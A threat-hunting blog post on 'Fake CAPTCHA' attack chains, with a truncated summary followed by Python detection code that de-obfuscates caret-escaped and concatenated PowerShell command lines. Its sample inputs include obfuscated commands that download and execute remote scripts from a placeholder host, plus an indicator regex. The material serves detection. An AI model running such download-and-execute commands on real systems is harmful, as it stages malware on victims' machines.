Published by The RSM Defense Threat Hunting Team
Author: Justin Dolgos - Sr. Threat Hunter
MITRE ATT&CK: T1204.002 · T1059 · T1218 · T1219 · T1222

⚠ TLDR Executive Summary
Our threat hunters built a custom detection that fires the moment a browser or Windows Explorer spawns a script or suspicious executable from a user-writable directory. In a recent ...
Fake Captcha Chains – Portable Behaviors, Practical Detections, And Field Notes
Executive Summary
RSM Defense’s Threat Hunting Team performed a focused investigation after reviewing recent intelligence on the “Fake CAPTCHA” campaign. Our hypothesis was: “If the actor is in the environment, we may observe escaped or obfuscated PowerShell commands (for example h^t^t^p) used to download and stage payloads.” The hunt confirmed activity that occurred over a ...
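The caret in h^t^t^p is cmd.exe's escape character: cmd strips each caret and passes the character after it through unchanged, so the string that reaches the child process is plain http, while a naive string match on the logged command line sees nothing. The hunt query implied by the summary above therefore has to normalize before matching. The following is an added example, not RSM Defense's query, that undoes caret escaping, folds PowerShell string concatenation ('ht'+'tp'), and then reports which download indicators were only visible after normalization. The indicator list and the sample command lines are constructed for illustration.

```python
import re


def decaret(cmd: str) -> str:
    """Undo cmd.exe caret escaping: '^x' becomes 'x', so 'h^t^t^p' -> 'http' and '^^' -> '^'."""
    out, i = [], 0
    while i < len(cmd):
        if cmd[i] == "^" and i + 1 < len(cmd):
            out.append(cmd[i + 1])
            i += 2
        else:
            out.append(cmd[i])
            i += 1
    return "".join(out)


# 'a'+'b' or "a"+"b" (quotes may be mixed); folded repeatedly until nothing changes.
CONCAT_RE = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def fold_concat(s: str) -> str:
    """Fold PowerShell literal concatenation: 'h'+'tt'+'p' -> 'http'."""
    prev = None
    while prev != s:
        prev = s
        s = CONCAT_RE.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), s)
    return s


# Download / execution indicators (assumed list; extend with what your environment sees).
INDICATOR_RE = re.compile(
    r"(?i)https?://|invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|invoke-expression|\biex\b"
)


def indicators(s: str) -> set[str]:
    return {m.lower() for m in INDICATOR_RE.findall(s)}


def analyze(cmdline: str) -> dict:
    """Normalize a logged command line and report indicators, flagging those hidden by escaping."""
    normalized = fold_concat(decaret(cmdline))
    raw, norm = indicators(cmdline), indicators(normalized)
    return {
        "normalized": normalized,
        "indicators": sorted(norm),
        "hidden": sorted(norm - raw),          # present only after normalization: obfuscation signal
        "downloader": bool(norm),
    }


# Constructed sample command lines (not from the incident described on the page).
SAMPLES = [
    r"cmd.exe /c powershell -w hidden -nop -c iwr h^t^t^p://example.invalid/a.ps1 -UseBasicParsing ^| iex",
    r"""powershell -c "$u='ht'+'tp://example.invalid/b'; iex (New-Object Net.WebClient).DownloadString($u)" """,
    r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    r'powershell -c "Invoke-WebRequest https://example.invalid/x -OutFile x"',
]


def run_samples() -> list[dict]:
    return [analyze(s) for s in SAMPLES]


if __name__ == "__main__":
    for s, r in zip(SAMPLES, run_samples()):
        print(f"downloader={r['downloader']} hidden={r['hidden']}\n  raw:  {s}\n  norm: {r['normalized']}")
```

Two practical notes. First, the normalization is deliberately lossy: cmd does not strip carets inside double quotes, but removing them everywhere costs only a rare false positive in a hunt query, whereas keeping them costs a missed hit. Second, the "hidden" field is the interesting one for triage: a command line where http:// exists only after de-escaping has no benign reason to look that way, which is exactly why the original hypothesis centred on the escape characters rather than on the URL itself.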

